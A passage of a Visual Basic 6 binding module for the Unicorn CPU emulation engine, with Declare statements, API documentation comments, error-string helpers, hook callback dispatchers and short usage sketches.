= 1335 ' UC_X86_INS_FDISI8087_NOP = 1336 ' UC_X86_INS_FENI8087_NOP = 1337 ' UC_X86_INS_ENDING = 1338 'End Enum '-- [x86 specific] --------------- '// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. '// Borrow from SegmentCache in qemu/target-i386/cpu.h 'typedef struct uc_x86_mmr { ' uint16_t selector; /* not used by GDTR and IDTR */ ' uint64_t base; /* handle 32 or 64 bit CPUs */ ' uint32_t limit; ' uint32_t flags; /* not used by GDTR and IDTR */ '} uc_x86_mmr; ' '// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) '// @user_data: user data passed to tracing APIs. 'typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); '-------------------------------- '// Hook type for all events of unmapped memory access '#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) '// Hook type for all events of illegal protected memory access '#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) '// Hook type for all events of illegal read memory access '#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) '// Hook type for all events of illegal write memory access '#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) '// Hook type for all events of illegal fetch memory access '#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) '// Hook type for all events of illegal memory access '#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) '// Hook type for all events of valid memory access '#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) '/* ' Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) ' ' @address: address where the code is being executed ' @size: size of machine instruction(s) being executed, or 0 when size is unknown ' @user_data: user data passed to tracing APIs. '*/ 'typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); ' public sub code_hook(byval uc as long , byval address as currency, byval size as long, byval user_data as long) ' '/* ' Callback function for tracing interrupts (for uc_hook_intr()) ' ' @intno: interrupt number ' @user_data: user data passed to tracing APIs. 
'*/
'typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data);
'
'/*
' Callback function for tracing IN instruction of X86
'
' @port: port number
' @size: data size (1/2/4) to be read from this port
' @user_data: user data passed to tracing APIs.
'*/
'typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data);
'
'/*
' Callback function for OUT instruction of X86
'
' @port: port number
' @size: data size (1/2/4) to be written to this port
' @value: data value to be written to this port
'*/
'typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data);
'
'/*
' Callback function for hooking memory (UC_MEM_READ, UC_MEM_WRITE & UC_MEM_FETCH)
'
' @type: this memory is being READ, or WRITE
' @address: address where the code is being executed
' @size: size of data being read or written
' @value: value of data being written to memory, or irrelevant if type = READ.
' @user_data: user data passed to tracing APIs
'*/
'typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type,
'        uint64_t address, int size, int64_t value, void *user_data);
'
'/*
' Callback function for handling invalid memory access events (UC_MEM_*_UNMAPPED and
'   UC_MEM_*PROT events)
'
' @type: this memory is being READ, or WRITE
' @address: address where the code is being executed
' @size: size of data being read or written
' @value: value of data being written to memory, or irrelevant if type = READ.
' @user_data: user data passed to tracing APIs
'
' @return: return true to continue, or false to stop program (due to invalid memory).
'*/
'typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type,
'        uint64_t address, int size, int64_t value, void *user_data);
'
'/*
' Memory region mapped by uc_mem_map() and uc_mem_map_ptr()
' Retrieve the list of memory regions with uc_mem_regions()
'*/
'typedef struct uc_mem_region {
'    uint64_t begin; // begin address of the region (inclusive)
'    uint64_t end;   // end address of the region (inclusive)
'    uint32_t perms; // memory permissions of the region
'} uc_mem_region;
'
'// All type of queries for uc_query() API.
'typedef enum uc_query_type {
'    // Dynamically query current hardware mode.
'    UC_QUERY_MODE = 1,
'    UC_QUERY_PAGE_SIZE,
'} uc_query_type;

Public Declare Function ucs_dynload Lib "ucvbshim.dll" (ByVal path As String) As Long

'/*
' Return combined API version & major and minor version numbers.
'
' @major: major number of API version
' @minor: minor number of API version
'
' @return hexadecimal number as (major << 8 | minor), which encodes both
'   major & minor versions.
'   NOTE: This returned value can be compared with version number made
'   with macro UC_MAKE_VERSION
'
'   For example, the second API version would return 1 in @major, and 1 in @minor.
'   The return value would be 0x0101
'
'   NOTE: if you only care about the returned value, but not major and minor values,
'   set both @major & @minor arguments to NULL.
'*/
'UNICORN_EXPORT
'unsigned int uc_version(unsigned int *major, unsigned int *minor);
Public Declare Function ucs_version Lib "ucvbshim.dll" (ByRef major As Long, ByRef minor As Long) As Long

'/*
' Determine if the given architecture is supported by this library.
'
' @arch: architecture type (UC_ARCH_*)
'
' @return True if this library supports the given arch.
'*/
'UNICORN_EXPORT
'bool uc_arch_supported(uc_arch arch);
Public Declare Function ucs_arch_supported Lib "ucvbshim.dll" (ByVal arch As uc_arch) As Long
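'--- illustrative sketch (not part of the original binding) ------------------
'A minimal example of loading the engine through the shim and checking the
'version and architecture support, using only the declares above. The dll path
'is a placeholder, and ucs_dynload returning nonzero on success is an assumption.
Sub DemoVersionCheck()
    Dim major As Long, minor As Long
    If ucs_dynload("unicorn.dll") = 0 Then Exit Sub     'assumed: 0 = load failure
    ucs_version major, minor                            'e.g. v1.0 -> major=1, minor=0
    Debug.Print "Unicorn v" & major & "." & minor
    If ucs_arch_supported(UC_ARCH_X86) = 0 Then Debug.Print "x86 not supported!"
End Sub
'------------------------------------------------------------------------------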
'/*
' Create new instance of unicorn engine.
'
' @arch: architecture type (UC_ARCH_*)
' @mode: hardware mode. This is a combination of UC_MODE_*
' @uc: pointer to uc_engine, which will be updated at return time
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc);
Public Declare Function ucs_open Lib "ucvbshim.dll" (ByVal arch As uc_arch, ByVal mode As uc_mode, ByRef hEngine As Long) As uc_err

'/*
' Close UC instance: MUST be called to release the handle when it is not used anymore.
' NOTE: this must be called only when there is no longer any usage of Unicorn.
' The reason is that this API releases some cached memory, thus access to any
' Unicorn API after uc_close() might crash your application.
' After this, @uc is invalid, and no longer usable.
'
' @uc: pointer to a handle returned by uc_open()
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_close(uc_engine *uc);
Public Declare Function ucs_close Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err

'/*
' Query internal status of engine.
'
' @uc: handle returned by uc_open()
' @type: query type. See uc_query_type
'
' @result: save the internal status queried
'
' @return: error code of uc_err enum type (UC_ERR_*, see above)
'*/
'// All type of queries for uc_query() API.
'typedef enum uc_query_type {
'    // Dynamically query current hardware mode.
'    UC_QUERY_MODE = 1,
'    UC_QUERY_PAGE_SIZE,
'} uc_query_type;
'UNICORN_EXPORT
'uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result);

'/*
' Report the last error number when some API function fails.
' Like glibc's errno, uc_errno might not retain its old value once accessed.
'
' @uc: handle returned by uc_open()
'
' @return: error code of uc_err enum type (UC_ERR_*, see above)
'*/
'UNICORN_EXPORT
'uc_err uc_errno(uc_engine *uc);
Public Declare Function ucs_errno Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err

'/*
' Return a string describing given error code.
'
' @code: error code (see UC_ERR_* above)
'
' @return: returns a pointer to a string that describes the error code
'   passed in the argument @code
'*/
'UNICORN_EXPORT
'const char *uc_strerror(uc_err code);
Public Declare Function ucs_strerror Lib "ucvbshim.dll" (ByVal code As uc_err) As Long

'/*
' Write to register.
'
' @uc: handle returned by uc_open()
' @regid: register ID that is to be modified.
' @value: pointer to the value that will be set to register @regid
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_reg_write(uc_engine *uc, int regid, const void *value);
Public Declare Function ucs_reg_write Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal regid As uc_x86_reg, ByRef value As Long) As uc_err

'/*
' Read register value.
'
' @uc: handle returned by uc_open()
' @regid: register ID that is to be retrieved.
' @value: pointer to a variable storing the register value.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_reg_read(uc_engine *uc, int regid, void *value);
Public Declare Function ucs_reg_read Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal regid As uc_x86_reg, ByRef value As Long) As uc_err
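'--- illustrative sketch (not part of the original binding) ------------------
'Opening an engine and round-tripping a register through the declares above.
'UC_ARCH_X86/UC_MODE_32/UC_X86_REG_EAX are assumed to be defined in the enums
'earlier in this module; err2str is the helper defined further below.
Sub DemoOpenClose()
    Dim hUc As Long, eax As Long
    If ucs_open(UC_ARCH_X86, UC_MODE_32, hUc) <> uc_err_ok Then Exit Sub
    ucs_reg_write hUc, UC_X86_REG_EAX, &H1234       'set EAX = 0x1234
    ucs_reg_read hUc, UC_X86_REG_EAX, eax           'read it back
    Debug.Print Hex(eax), err2str(ucs_errno(hUc))
    ucs_close hUc
End Sub
'------------------------------------------------------------------------------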
'/*
' Write multiple register values.
'
' @uc: handle returned by uc_open()
' @regs: array of register IDs to store
' @value: pointer to array of register values
' @count: length of both *regs and *vals
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count);
'
'/*
' Read multiple register values.
'
' @uc: handle returned by uc_open()
' @regs: array of register IDs to retrieve
' @value: pointer to array of values to hold registers
' @count: length of both *regs and *vals
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count);

'/*
' Write to a range of bytes in memory.
'
' @uc: handle returned by uc_open()
' @address: starting memory address of bytes to set.
' @bytes: pointer to a variable containing data to be written to memory.
' @size: size of memory to write to.
'
' NOTE: @bytes must be big enough to contain @size bytes.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size);
Public Declare Function ucs_mem_write Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef b As Byte, ByVal size As Long) As uc_err

'/*
' Read a range of bytes in memory.
'
' @uc: handle returned by uc_open()
' @address: starting memory address of bytes to get.
' @bytes: pointer to a variable containing data copied from memory.
' @size: size of memory to read.
'
' NOTE: @bytes must be big enough to contain @size bytes.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size);
Public Declare Function ucs_mem_read Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef b As Byte, ByVal size As Long) As uc_err

'/*
' Emulate machine code for a specific duration of time.
'
' @uc: handle returned by uc_open()
' @begin: address where emulation starts
' @until: address where emulation stops (i.e. when this address is hit)
' @timeout: duration to emulate the code (in microseconds). When this value is 0,
'   we will emulate the code in infinite time, until the code is finished.
' @count: the number of instructions to be emulated. When this value is 0,
'   we will emulate all the code available, until the code is finished.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count);
Public Declare Function ucs_emu_start Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal startAt As Currency, ByVal endAt As Currency, ByVal timeout As Currency, ByVal count As Long) As uc_err
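'--- illustrative sketch (not part of the original binding) ------------------
'Map a page, write two single-byte instructions, emulate them, and read the
'bytes back. The 64-bit addresses travel in Currency parameters; the sketch
'assumes the usual VB6 trick that a Currency's raw 64-bit value is its VB value
'times 10000, so dividing by 10000 makes the raw bits equal the address.
'ucs_mem_map and UC_PROT_* are declared/defined elsewhere in this module.
Function Addr64(ByVal a As Long) As Currency
    Addr64 = CCur(a) / 10000    'raw 64-bit bits of the Currency now equal a
End Function

Sub DemoEmulate()
    Dim hUc As Long
    Dim code(1) As Byte, buf(1) As Byte
    code(0) = &H40: code(1) = &H41                  'inc eax / inc ecx
    If ucs_open(UC_ARCH_X86, UC_MODE_32, hUc) <> uc_err_ok Then Exit Sub
    ucs_mem_map hUc, Addr64(&H10000), &H1000, UC_PROT_READ Or UC_PROT_WRITE Or UC_PROT_EXEC
    ucs_mem_write hUc, Addr64(&H10000), code(0), 2
    ucs_emu_start hUc, Addr64(&H10000), Addr64(&H10002), 0, 0
    ucs_mem_read hUc, Addr64(&H10000), buf(0), 2    'read the code bytes back
    ucs_close hUc
End Sub
'------------------------------------------------------------------------------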
'/*
' Stop emulation (which was started by the uc_emu_start() API).
' This is typically called from callback functions registered via tracing APIs.
' NOTE: for now, this will stop the execution only after the current block.
'
' @uc: handle returned by uc_open()
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_emu_stop(uc_engine *uc);
Public Declare Function ucs_emu_stop Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err

'/*
' Register callback for a hook event.
' The callback will be run when the hook event is hit.
'
' @uc: handle returned by uc_open()
' @hh: hook handle returned from this registration. To be used in uc_hook_del() API
' @type: hook type
' @callback: callback to be run when instruction is hit
' @user_data: user-defined data. This will be passed to callback function in its
'   last argument @user_data
' @begin: start address of the area where the callback is in effect (inclusive)
' @end: end address of the area where the callback is in effect (inclusive)
'   NOTE 1: the callback is called only if related address is in range [@begin, @end]
'   NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered
' @...: variable arguments (depending on @type)
'   NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT)
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err __stdcall ucs_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...)
'
'note: vb6 does not support variable-length arguments to api declares, so UC_HOOK_INSN would require a separate declare and stub
'also note that the callback is not used directly, it is proxied through a cdecl stub
'since the hook flags can be different combos, we pass in a category for simplicity in selecting which c callback to use..(bit sloppy but easy)
Public Declare Function ucs_hook_add Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef hHook As Long, ByVal hType As uc_hook_type, ByVal callback As Long, ByVal user_data As Long, ByVal beginAt As Currency, ByVal endAt As Currency, ByVal category As Long, Optional ByVal inst_id As Long = 0) As uc_err

'/*
' Unregister (remove) a hook callback.
' This API removes the hook callback registered by uc_hook_add().
' NOTE: this should be called only when you no longer want to trace.
' After this, @hh is invalid, and no longer usable.
'
' @uc: handle returned by uc_open()
' @hh: handle returned by uc_hook_add()
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_hook_del(uc_engine *uc, uc_hook hh);
Public Declare Function ucs_hook_del Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal hHook As Long) As uc_err

'/*
' Map memory in for emulation.
' This API adds a memory region that can be used by emulation.
'
' @uc: handle returned by uc_open()
' @address: starting address of the new memory region to be mapped in.
'   This address must be aligned to 4KB, or this will return with UC_ERR_ARG error.
' @size: size of the new memory region to be mapped in.
'   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error.
' @perms: Permissions for the newly mapped region.
'   This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC,
'   or this will return with UC_ERR_ARG error.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms);
Public Declare Function ucs_mem_map Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perms As uc_prot) As uc_err
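'--- illustrative sketch (not part of the original binding) ------------------
'Registering the module-level code_hook callback (defined near the end of this
'module) for every address: begin > end means "always fire" (see NOTE 2 above).
'The category argument selects the shim's internal cdecl proxy; the value 0 for
'a plain code hook is an assumption, not documented here.
Sub DemoAddCodeHook(ByVal hUc As Long, ByVal objPtr As Long)
    Dim hHook As Long
    ucs_hook_add hUc, hHook, UC_HOOK_CODE, AddressOf code_hook, objPtr, CCur(1), CCur(0), 0
    '... run ucs_emu_start here; code_hook fires per instruction ...
    ucs_hook_del hUc, hHook
End Sub
'------------------------------------------------------------------------------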
'/*
' Map existing host memory in for emulation.
' This API adds a memory region that can be used by emulation.
'
' @uc: handle returned by uc_open()
' @address: starting address of the new memory region to be mapped in.
'   This address must be aligned to 4KB, or this will return with UC_ERR_ARG error.
' @size: size of the new memory region to be mapped in.
'   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error.
' @perms: Permissions for the newly mapped region.
'   This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC,
'   or this will return with UC_ERR_ARG error.
' @ptr: pointer to host memory backing the newly mapped memory. This host memory is
'   expected to be of equal or larger size than provided, and be mapped with at
'   least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr);
Public Declare Function ucs_mem_map_ptr Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perms As uc_prot, ByVal ptr As Long) As uc_err

'/*
' Unmap a region of emulation memory.
' This API deletes a memory mapping from the emulation memory space.
'
' @uc: handle returned by uc_open()
' @address: starting address of the memory region to be unmapped.
'   This address must be aligned to 4KB, or this will return with UC_ERR_ARG error.
' @size: size of the memory region to be modified.
'   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size);
Public Declare Function ucs_mem_unmap Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long) As uc_err

'/*
' Set memory permissions for emulation memory.
' This API changes permissions on an existing memory region.
'
' @uc: handle returned by uc_open()
' @address: starting address of the memory region to be modified.
'   This address must be aligned to 4KB, or this will return with UC_ERR_ARG error.
' @size: size of the memory region to be modified.
'   This size must be a multiple of 4KB, or this will return with UC_ERR_ARG error.
' @perms: New permissions for the mapped region.
'   This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC,
'   or this will return with UC_ERR_ARG error.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms);
Public Declare Function ucs_mem_protect Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perm As uc_prot) As uc_err
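'--- illustrative sketch (not part of the original binding) ------------------
'Map a scratch page read/write, flip it to read/execute, then unmap it, using
'the Addr64 helper from the earlier sketch. UC_PROT_* values are assumed to be
'defined in the uc_prot enum earlier in this module.
Sub DemoProtect(ByVal hUc As Long)
    ucs_mem_map hUc, Addr64(&H200000), &H1000, UC_PROT_READ Or UC_PROT_WRITE
    ucs_mem_protect hUc, Addr64(&H200000), &H1000, UC_PROT_READ Or UC_PROT_EXEC
    ucs_mem_unmap hUc, Addr64(&H200000), &H1000
End Sub
'------------------------------------------------------------------------------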
'/*
' Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr()
' This API allocates memory for @regions, and the user must free this memory later
' by free() to avoid leaking memory.
' NOTE: memory regions may be split by uc_mem_unmap()
'
' @uc: handle returned by uc_open()
' @regions: pointer to an array of uc_mem_region struct. This is allocated by
'   Unicorn, and must be freed by user later
' @count: pointer to number of struct uc_mem_region contained in @regions
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count);
'simplified for vb use: uc_err __stdcall getMemMap(uc_engine *uc, _CollectionPtr *pColl){
'fills a collection with csv values of all memory regions..
Public Declare Function get_memMap Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef col As Collection) As uc_err

'/*
' Allocate a region that can be used with uc_context_{save,restore} to perform
' quick save/rollback of the CPU context, which includes registers and some
' internal metadata. Contexts may not be shared across engine instances with
' differing arches or modes.
'
' @uc: handle returned by uc_open()
' @context: pointer to a uc_engine*. This will be updated with the pointer to
'   the new context on successful return of this function.
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_context_alloc(uc_engine *uc, uc_context **context);
Public Declare Function ucs_context_alloc Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef context As Long) As uc_err

'/*
' Free the resource allocated by uc_context_alloc.
'
' @context: handle returned by uc_context_alloc()
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_free(void* mem);
Public Declare Function ucs_free Lib "ucvbshim.dll" (ByVal mem As Long) As uc_err

'/*
' Save a copy of the internal CPU context.
' This API should be used to efficiently make or update a saved copy of the
' internal CPU state.
'
' @uc: handle returned by uc_open()
' @context: handle returned by uc_context_alloc()
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_context_save(uc_engine *uc, uc_context *context);
Public Declare Function ucs_context_save Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal context As Long) As uc_err

'/*
' Restore the current CPU context from a saved copy.
' This API should be used to roll the CPU context back to a previous
' state saved by uc_context_save().
'
' @uc: handle returned by uc_open()
' @buffer: handle returned by uc_context_alloc that has been used with uc_context_save
'
' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
'   for detailed error).
'*/
'UNICORN_EXPORT
'uc_err uc_context_restore(uc_engine *uc, uc_context *context);
Public Declare Function ucs_context_restore Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal context As Long) As uc_err

'uses libdasm to retrieve the 32bit disassembly at a specified va
'int __stdcall disasm_addr(uc_engine *uc, int va, char *str, int bufLen){
Public Declare Function disasm_addr Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Long, ByVal buf As String, ByVal size As Long) As Long

'simplified access to map and write data to emu memory
'uc_err __stdcall mem_write_block(uc_engine *uc, uint64_t address, void* data, uint32_t size, uint32_t perm){
Public Declare Function mem_write_block Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef data As Byte, ByVal size As Long, ByVal perm As Long) As uc_err

Private Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As String) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long
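'--- illustrative sketch (not part of the original binding) ------------------
'Snapshot and roll back the CPU state around a run, using only the context
'declares above.
Sub DemoContext(ByVal hUc As Long)
    Dim ctx As Long
    If ucs_context_alloc(hUc, ctx) <> uc_err_ok Then Exit Sub
    ucs_context_save hUc, ctx           'snapshot registers and internal state
    '... run some code with ucs_emu_start ...
    ucs_context_restore hUc, ctx        'roll the CPU state back
    ucs_free ctx
End Sub
'------------------------------------------------------------------------------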
'api version of the below..
'Function err2str(e As uc_err) As String
'    Dim lpStr As Long
'    Dim length As Long
'    Dim buf() As Byte
'
'    lpStr = ucs_strerror(e)
'    If lpStr = 0 Then Exit Function
'
'    length = lstrlen(lpStr)
'    If length = 0 Then Exit Function
'
'    ReDim buf(1 To length)
'    CopyMemory buf(1), ByVal lpStr, length
'
'    err2str = StrConv(buf, vbUnicode, &H409)
'
'End Function

Function err2str(e As uc_err) As String
    err2str = "Unknown error code: " & e
    If e = uc_err_ok Then err2str = "No error: everything was fine"
    If e = UC_ERR_NOMEM Then err2str = "Out-Of-Memory error: uc_open(), uc_emulate()"
    If e = UC_ERR_ARCH Then err2str = "Unsupported architecture: uc_open()"
    If e = UC_ERR_HANDLE Then err2str = "Invalid handle"
    If e = UC_ERR_MODE Then err2str = "Invalid/unsupported mode: uc_open()"
    If e = UC_ERR_VERSION Then err2str = "Unsupported version (bindings)"
    If e = UC_ERR_READ_UNMAPPED Then err2str = "Quit emulation due to READ on unmapped memory: uc_emu_start()"
    If e = UC_ERR_WRITE_UNMAPPED Then err2str = "Quit emulation due to WRITE on unmapped memory: uc_emu_start()"
    If e = UC_ERR_FETCH_UNMAPPED Then err2str = "Quit emulation due to FETCH on unmapped memory: uc_emu_start()"
    If e = UC_ERR_HOOK Then err2str = "Invalid hook type: uc_hook_add()"
    If e = UC_ERR_INSN_INVALID Then err2str = "Quit emulation due to invalid instruction: uc_emu_start()"
    If e = UC_ERR_MAP Then err2str = "Invalid memory mapping: uc_mem_map()"
    If e = UC_ERR_WRITE_PROT Then err2str = "Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start()"
    If e = UC_ERR_READ_PROT Then err2str = "Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start()"
    If e = UC_ERR_FETCH_PROT Then err2str = "Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start()"
    If e = UC_ERR_ARG Then err2str = "Invalid argument provided to uc_xxx function (See specific function API)"
    If e = UC_ERR_READ_UNALIGNED Then err2str = "Unaligned read"
    If e = UC_ERR_WRITE_UNALIGNED Then err2str = "Unaligned write"
    If e = UC_ERR_FETCH_UNALIGNED Then err2str = "Unaligned fetch"
    If e = UC_ERR_HOOK_EXIST Then err2str = "hook for this event already existed"
    If e = UC_ERR_RESOURCE Then err2str = "Insufficient resource: uc_emu_start()"
    If e = UC_ERR_EXCEPTION Then err2str = "Unhandled CPU exception"
End Function

Function memType2str(t As uc_mem_type) As String
    memType2str = "Unknown memType: " & t
    If t = UC_MEM_READ Then memType2str = "Memory is read from"
    If t = uc_mem_write Then memType2str = "Memory is written to"
    If t = UC_MEM_FETCH Then memType2str = "Memory is fetched"
    If t = UC_MEM_READ_UNMAPPED Then memType2str = "Unmapped memory is read from"
    If t = UC_MEM_WRITE_UNMAPPED Then memType2str = "Unmapped memory is written to"
    If t = UC_MEM_FETCH_UNMAPPED Then memType2str = "Unmapped memory is fetched"
    If t = UC_MEM_WRITE_PROT Then memType2str = "Write to write protected, but mapped, memory"
    If t = UC_MEM_READ_PROT Then memType2str = "Read from read protected, but mapped, memory"
    If t = UC_MEM_FETCH_PROT Then memType2str = "Fetch from non-executable, but mapped, memory"
    If t = UC_MEM_READ_AFTER Then memType2str = "Memory is read from (successful access)"
End Function

'--------------------- [ callback support ] ---------------------------------------------
'so the callbacks must live in a module (vb6 language limitation/safety feature)
'we use a simple lookup mechanism to support multiple instances
Function findInstance(ptr As Long) As ucIntel32
    On Error Resume Next
    Set findInstance = instances("objptr:" & ptr)
End Function

'in case we want to keep userdata for something else..this
is just as easy.. Function findInstanceByUc(uc As Long) As ucIntel32 Dim u As ucIntel32 For Each u In instances If u.uc = uc Then Set findInstanceByUc = u Exit Function End If Next End Function 'typedef void (__stdcall *vb_cb_hookcode_t) (uc_engine *uc, uint64_t address, uint32_t size, void *user_data); Public Sub code_hook(ByVal uc As Long, ByVal address As Currency, ByVal size As Long, ByVal user_data As Long) Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Sub u.internal_code_hook address, size End Sub Public Sub block_hook(ByVal uc As Long, ByVal address As Currency, ByVal size As Long, ByVal user_data As Long) Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Sub u.internal_block_hook address, size End Sub 'typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); Public Sub mem_hook(ByVal uc As Long, ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency, ByVal user_data As Long) Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Sub u.internal_mem_hook t, address, size, value End Sub 'typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); Public Function invalid_mem_hook(ByVal uc As Long, ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency, ByVal user_data As Long) As Long 'return 0 to stop emulation, 1 to continue Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Function invalid_mem_hook = u.internal_invalid_mem_hook(t, address, size, value) End Function 'typedef void (*vb_cb_hookintr_t)(uc_engine *uc,uint32_t intno, void *user_data); Public 